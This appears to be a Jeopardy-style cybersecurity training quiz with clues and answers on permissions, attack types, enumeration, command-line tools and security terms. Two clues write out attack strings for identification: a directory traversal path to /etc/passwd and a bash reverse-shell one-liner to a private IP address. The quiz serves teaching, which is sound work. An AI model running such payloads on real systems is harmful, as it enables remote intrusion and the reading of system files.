Data Protection
Attack types
Enumeration
Command tools
Misc
100

3 basic Linux permissions


JN

Read, Write, Execute

100

../../../../../../etc/passwd


SD

Directory traversal

100

Term for mapping out the layout of a network, typically in terms of IP address usage, routing topology, and DNS namespace


FT

Footprinting

100

Windows command line version of task manager


AS

Tasklist

100

Which of the following are threats discovered in live environments that have no current fix or patch?


ZD

Zero day

200

System to configure classification, confidentiality, and privacy rules and policies, log incidents, and compile reports. Can block files from leaving network


AL

DLP Data Loss Prevention

200

Injects malicious code from the client browser in the context of a trusted page


FD

XSS  Cross site script

200

Tool that uses TCP SYN to scan for host discovery with fingerprinting of active hosts



ZM

NMAP

200

Command to change permissions on Linux


CH

Chmod

200

Email authentication method that uses a digital signature to let the receiver of an email know that the message was sent and authorized by the owner of a domain.


LS

DKIM Domain Keys Identified Mail

300

Permission type needed in Microsoft to connect to folder on different computer


SA

Share

300

Access a large number of accounts with a few commonly used passwords


EW

Password spraying

300

Command line tool for web app vulnerabilities



MA

Nikto

300

Linux command used to extract text from the binary files



QA

Strings

300

Developed by Lockheed Martin.7 step model for identification and prevention of cyber intrusions activity.


DM

Kill Chain

400

State of data when encrypted on a hard disk. Data at ?


ER

Rest

400

What is this an example of

bash –i >& /dev/tcp/10.20.100.1/8181 0>&1


vd

Reverse shell

400

Tool by OWASP to identify web application vulnerabilities by proxy


GD

ZAP   Zed Attack Proxy

400

Command to show open ports on PC


NS

Netstat

400

Term for collection and analysis of publicly available information appearing in print or electronic form


NR

OSINT (Open Source Intelligence)

500

Microsoft tool used on NTFS volumes to encrypt individual files and folders


RD

EFS  Encrypted file system

500

The attacker tests username and password combinations against multiple online sites


CS

Credential stuffing

500

Term to perform host system detection to map out open ports, OS type and version, file shares, running services and applications, system uptime, and other useful metadata


SW

Fingerprinting

500

Used to interact with a web server using a command line interface.


WG

Wget or cURL

500

What is the minimum version that should be used for TLS


GL

1.2

M
e
n
u